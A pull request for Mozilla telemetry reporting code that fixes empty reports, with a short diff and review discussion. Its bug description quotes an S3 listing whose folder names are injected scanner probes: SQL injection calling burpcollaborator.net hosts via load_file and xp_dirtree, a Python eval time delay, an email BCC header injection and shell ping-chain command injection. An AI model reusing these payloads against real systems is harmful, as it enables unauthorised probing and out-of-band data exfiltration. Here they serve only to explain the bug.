### PR TITLE
Fix empty reports due to garbage sent by burp collaborator

### PR DESCRIPTION
**Pull request by acmiyaguchi**
This PR a few small things like updating the mps submodule, making the `integration` script the only supported entrypoint into reporting, and updating system dependencies. 

It also fixes the bug causing empty reports on `mozilla-pipeline-schemas`. In short, the bug was as follows:

```
$ aws s3 ls s3://telemetry-parquet/sanitized-landfill-sample/v3/submission_date_s3=20190718/                           PRE namespace=(select load_file(%27%5C%5C%5C%5C93axjpekldk99vfev6w6623jaag44vsmuarxil7.burpcollaborator.net%5C%5Cknm%27))/
                           PRE namespace=activity-stream/
                           PRE namespace=bugzilla/
                           PRE namespace=coverage/
                           PRE namespace=eng-workflow/
                           PRE namespace=firefox-installer/
                           PRE namespace=firefox-launcher-process/
                           PRE namespace=mobile/
                           PRE namespace=org-mozilla-fenix-nightly/
                           PRE namespace=org-mozilla-fenix-performancetest/
                           PRE namespace=org-mozilla-fenix/
                           PRE namespace=org-mozilla-reference-browser/
                           PRE namespace=org-mozilla-tv-firefox/
                           PRE namespace=org-mozilla-tv-testfox/
                           PRE namespace=pocket/
                           PRE namespace=telemetry%27+eval(compile(%27for x in range(1)%3A%5Cn import time%5Cn time.sleep(20)%27,%27a%27,%27single%27))+%27/
                           PRE namespace=telemetry);declare @q varchar(99);set @q%3D%27%5C%5C3vzrbj6ed7c31p78n0o0ywvd248ywpkgc49r0fp.burpcollab%27+%27orator.net%5Crli%27; exec master.dbo.xp_dirtree @q;-- /
                           PRE namespace=telemetry/
                           PRE namespace=telemetry91195661%27 or %278691%27%3D%278697/
                           PRE namespace=telemetry>%0D%0ABCC%3Aqpje56017u6qvc1vhninsjp0wr2lqde58t5gw4l@burpcollaborator.net%0D%0Awhi%3A z/
                           PRE namespace=telemetry|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` %23%27 |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` %23%5C%22 |ping -n 21 127.0.0.1/
                           PRE namespace=webpagetest/
2019-07-18 18:20:04          0 _SUCCESS
```

The garbage at the end with spaces in it causes the `namespace_dir` variable to be named `sanitized-landfill-sample/v3`. The integration command expects folders that are dates -- the max between a folder name that is a number vs word is the word. That folder is empty, so the report ends up being empty.

### CODE REVIEW

File: integration.py [hunk 1]
```diff
@@ -322,7 +322,8 @@ def _run_report(rev):
             return output_path
 
         Environment.checkout(rev)
-        Environment.sync()
+        # NOTE: this sync only copies schemas and uses cached data
+        Environment.sync({"INCLUDE_DATA": "false"})
```
Comment (fbertsch) [inline integration.py]: Can you clarify a bit on why this change was required?

Comment (acmiyaguchi) [reply integration.py]: The SRC_DATA_BUCKET and SRC_DATA_PREFIX aren't being set in the arguments, so it'll error when it gets used in the bash script.
